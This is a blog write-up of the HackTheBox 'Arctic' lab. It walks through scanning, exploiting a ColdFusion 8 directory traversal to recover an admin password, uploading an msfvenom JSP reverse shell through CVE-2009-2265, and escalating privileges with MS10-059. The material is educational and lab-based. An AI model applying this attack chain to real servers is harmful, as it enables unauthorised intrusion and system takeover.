Ethical Hacking Lessons — Arctic Writeup

8 min readNov 5, 2019

This write-up is for the hackthebox Arctic machine. This box highlights the weaknesses associated with use of weak password techniques that adversaries can exploit and gain full control of a machine.

Its a windows machine with an IP address of 10.10.10.11. The radar graph shows presence of CVEs.

Recon

Let’s start active recon with the Nmap TCP scan.

nmap -A -T4 -p- -oX tcp_scan_results.xml 10.10.10.11

Below are the results produced by the scan.

UPD port didn’t finish though.

Recon Results Analysis

Two Microsoft Windows RPC ports 135 and 49154 are open. There is another port 8500 also open, NMap's best guess is that it possibly running a fmtp service.

Enumeration

Let’s start with the RPC services. I used rpcclient with the following switches.

-U: Network user name
-N: This parameter suppresses the normal password prompt

Tried a few combinations of username/passwords without any luck.

searchsploit for RPC provided a long list of exploits, however, nothing very specific. It could take a really long time to try all of those. Also further googling suggested that RPC services are not among the easiest to exploit, so I decided to check on the next service first and avoid any potential rabbit hole.

Googling the FMTP suggested this may be Flight Message Transfer Protocol. Searchsploit results do not look too promising for our use case where we need some type of RCE.

Then I attempted to navigate to this port in the browser. It took somewhere between 20–25 seconds but that leads me to the following page.

This potentially could be some type of web-server. As you can see in the image above, it provided a list of two folders. Clicking on the CFIDE directory navigated to the following page that again took 20–25 seconds.

The sub listing of CFIDE folder has an administrator folder that could be interesting. Clicking on it navigated to the Coldfusion Administration panel.

This page is showing that its running version 8 of Coldfusion.

Enumeration Analysis

We found that the box is running version 8 of Adobe Coldfusion.

Exploitation

I tried a few common passwords on the Coldfusion administration panel but none of those work. I then use searchsploit to look for any available exploits that have a couple of interesting ones.

Let’s start with the Directory Traversal exploit EDB-ID 14641 that reports a CVE-2010–2861 about this issue. The description of exploit also provides an example of how to attempt this exploit as shown below.

Using this example brings up the following page showing a password as well.

Inspecting the source code of this page indicates the use of HMAC and SHA1 for the password.

Even though brute-forcing the password is a possibility, given every page refresh has a 20–25 seconds delay, that does look like a practical path to follow. I simply tried an online password cracking tool that gave us immediate results.

I tried admin/happyday as username/password and login was successful showing the following page.

This page offers a menu item for Scheduled Tasks. Clicking on that navigates to the following page.

If you click on the “Schedule New Task” button, it brings up the following page.

As you can see this form has an option to input a file path. This could possibly help us uploading a malicious file to this server. We already saw that another exploit identified has something to do with Arbitrary File upload. Let’s get more information about it.

This exploit DB entry EBD-ID 45979 points towards CVE-2018–15951.

The obvious next step is to see if we can upload a reverse shell here. The logical question is what type of reverse shell should be used. I came across What is ColdFusion link that suggests its build using Java.

Good news is that msfvenom supports java payload as shown below.

Let’s create a payload in jsp format.

Of course, don’t forget to launch the listener from our attack machine at port 8888.

Now we can go back to the Scheduled Task page to create a new task.

After creating the task, we can simply run that task from the following page that should trigger the shell we uploaded.

However, this did not give me any shell. I tried many all possible combinations of jsp payloads and tried to run the file from the browser but without any luck. So I was back to google lookout for any other solutions.

I came across a python script that seems to use CVE-2009–2265 to upload an arbitrary file to a remote server. Let’s try to use this to upload the same jsp payload. This file also shows the path where the file was uploaded as shown below.

Our listener is still running. So now just use the url reported by the exploit

http://10.10.10.11:8500/userfiles/file/exploit.jsp

After a little bit of wait, I surely got a shell. It was a low-privilege one as shown in the image below.

And of course, don’t forget to get the user flag.

Priv Escalation

In order to grab the root flag, we need to try priv escalation. Let’s first find out little more information using the systeminfo command.

As shown in the image above, its a Windows Server 2008 R2 box with no patches installed. We can use windows-exploit-suggester script to try to see what exploits could be used. However, before running that script, let’s update it. This command outputs its database file name.

Next, we run the script against the output of systeminfo command that I saved in a local file systeminfo.txt. This provided several suggestions, some with Metasploit others without it. Eventually, the exploit for MS10–059 worked.